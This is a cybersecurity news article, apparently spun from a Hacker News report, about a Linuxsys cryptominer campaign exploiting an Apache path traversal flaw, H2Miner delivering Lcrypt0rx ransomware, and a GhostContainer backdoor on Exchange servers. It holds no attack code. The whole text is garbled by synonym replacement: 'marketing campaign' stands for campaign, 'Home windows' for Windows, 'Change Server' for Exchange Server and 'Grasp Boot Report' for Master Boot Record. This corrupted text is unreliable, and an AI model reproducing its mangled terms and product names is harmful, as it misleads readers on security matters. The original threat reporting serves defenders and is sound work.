Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner"
title="miner.jpg"
/>
Cybersecurity researchers have found a brand new marketing campaign that exploits a identified safety flaw impacting Apache HTTP Server to ship a cryptocurrency miner referred to as Linuxsys.
The vulnerability in query is CVE-2021-41773 (CVSS rating: 7.5), a high-severity path traversal vulnerability in Apache HTTP Server model 2.4.49 that would end in distant code execution.
“The attacker leverages compromised respectable web sites to distribute malware, enabling stealthy supply and evasion of detection,” VulnCheck’s Jacob Baines mentioned in a report shared with The Hacker Information.
The an infection sequence, noticed earlier this month and originating from an Indonesian IP handle 103.193.177[.]152, is designed to drop a next-stage payload from “repositorylinux[.]org” utilizing curl or wget.
The payload is a shell script that is chargeable for downloading the Linuxsys cryptocurrency miner from 5 completely different respectable web sites, suggesting that the risk actors behind the marketing campaign have managed to compromise third-party infrastructure to facilitate the distribution of the malware.
“This method is intelligent as a result of victims connect with respectable hosts with legitimate SSL certificates, making detection much less probably,” VulnCheck famous. “Moreover, it offers a layer of separation for the downloader website (‘repositorylinux[.]org’) for the reason that malware itself is not hosted there.”
The websites additionally host one other shell script named “cron.sh” that ensures that the miner is launched robotically upon a system reboot. Cybersecurity agency mentioned it additionally recognized two Home windows executables on the hacked websites, elevating the chance that the attackers are additionally going after Microsoft’s desktop working system.
It is value noting that assaults distributing the Linuxsys miner have beforehand exploited a essential safety flaw in OSGeo GeoServer GeoTools (CVE-2024-36401, CVSS rating: 9.8), as documented by Fortinet FortiGuard Labs in September 2024.
Apparently, the shell script dropped following the exploitation of the flaw was downloaded from “repositorylinux[.]com,” with feedback within the supply code written in Sundanese, an Indonesian language. The identical shell script has been detected within the wild way back to December 2021.
A few of the different vulnerabilities exploited to ship the miner lately embrace –
- CVE-2023-22527, a template injection vulnerability in Atlassian Confluence Knowledge Heart and Confluence Server
- CVE-2023-34960, a command injection vulnerability in Chamilo Studying Administration Methods (LMS)
- CVE-2023-38646, a command injection vulnerability in Metabase
- CVE-2024-0012 and CVE-2024-9474, are authentication bypass and privilege escalation vulnerabilities in Palo Alto Networks firewalls
“All of this means that the attacker has been conducting a long-term marketing campaign, using constant methods akin to n-day exploitation, staging content material on compromised hosts, and coin mining on sufferer machines,” VulnCheck mentioned.
“A part of their success comes from cautious concentrating on. They seem to keep away from low interplay honeypots and require excessive interplay to look at their exercise. Mixed with using compromised hosts for malware distribution, this method has largely helped the attacker keep away from scrutiny.”
The invention of Linuxsys miner assaults coincides with a brand new marketing campaign related to the H2Miner cryptocurrency mining botnet that delivers Kinsing, a distant entry trojan (RAT) generally used to ship mining malware by concentrating on all kinds of Linux-based infrastructure methods.
What makes the assault chain stand out is that it additionally delivers a Visible Fundamental Script-based variant of Lcryx ransomware, referred to as Lcrypt0rx, marking the primary documented occasion of operational overlap between the 2 malware households.
“Lcryx is a comparatively new VBScript-based ransomware pressure first noticed in November 2024,” safety researcher Akshat Pradhan mentioned. “This household reveals a number of uncommon traits that recommend it might have been generated utilizing synthetic intelligence.”
The assaults contain using a shell script that terminates processes associated to safety instruments, databases, and different consumer functions earlier than dropping Kinsing, which then delivers the XMRig miner. It is also designed to kill competing miner processes that could be already working on compromised hosts.
The Lcrypt0rx artifact, for its half, makes Home windows Registry modifications to disable the execution of essential instruments like System Configuration Utility, Group Coverage Editor, Course of Explorer, and System Settings Utility. It additionally turns off safety software program from Microsoft, Bitdefender, and Kaspersky, and makes an attempt to overwrite the Grasp Boot Report (MBR) in a harmful transfer that is meant to render the system unbootable.
In an fascinating twist, Lcrypt0rx downloads extra payloads onto the compromised machine previous to encryption, together with the identical XMRig payload dropped by H2Miner, Cobalt Strike, ConnectWise ScreenConnect, data stealers like Lumma and RustyStealer, and an injector that serves DCRat.
As soon as the information are encrypted, a ransom notice is dropped in a number of places, urging victims to pay $1,000 in cryptocurrency inside three days, or threat getting their information leaked.
“Regardless of these actions, the ransomware doesn’t transmit or retailer the encryption keys domestically or remotely,” Pradhan mentioned. “Mixed with using easy XOR encryption, this makes restoration trivial by fundamental cryptanalysis. The shortage of key administration, mixed with the presence of scare techniques and superficial ransom calls for, means that Lcrypt0rx operates extra as scareware than a severe ransomware risk.”
This habits, Fortinet FortiGuard Labs theorized, is both a collaboration to maximise monetary achieve, or that it is the work of H2Miner operators themselves or a means for them to make use of it as a distraction from recognizing the mining exercise.
The marketing campaign indicators the continued commodification of cybercrime, as entry to pre-built instruments and AI-generated code can additional decrease the barrier to entry, enabling even risk actors with little-to-no technical experience to launch high-impact assaults at scale.
“Each the H2Miner and Lcrypt0rx chains converge on the deployment of Monero miners, an indicator of useful resource hijacking campaigns,” Fortinet mentioned. “In cloud environments, this ends in important monetary impression, as compromised methods incur elevated compute prices, degraded efficiency, and elevated operational threat.”
Change Servers Focused by GhostContainer Backdoor
The event comes as Kaspersky disclosed particulars of a marketing campaign that is concentrating on authorities entities in Asia, probably with a N-day safety flaw in Microsoft Change Server, to deploy a bespoke backdoor dubbed GhostContainer. It is suspected that the assaults could have exploited a now-patched distant code execution bug in Change Server (CVE-2020-0688, CVSS rating: 8.8).
The “subtle, multi-functional backdoor” will be “dynamically prolonged with arbitrary performance by the obtain of extra modules,” the Russian firm mentioned, including “the backdoor grants the attackers full management over the Change server, permitting them to execute a spread of malicious actions.”
The malware is supplied to parse directions that may execute shellcode, obtain information, learn or delete information, run arbitrary instructions, and cargo extra .NET byte code. It additionally incorporates an online proxy and tunneling module.
It is suspected that the exercise could have been a part of a complicated persistent risk (APT) marketing campaign geared toward high-value organizations, together with high-tech corporations, in Asia.
Not a lot is thought about who’s behind the assaults, though they’re assessed to be extremely expert owing to their in-depth understanding of Microsoft Change Server and their capability to rework publicly accessible code into superior espionage instruments.
“The GhostContainer backdoor doesn’t set up a connection to any [command-and-control] infrastructure,” Kaspersky mentioned. “As a substitute, the attacker connects to the compromised server from the surface, and their management instructions are hidden inside regular Change net requests.”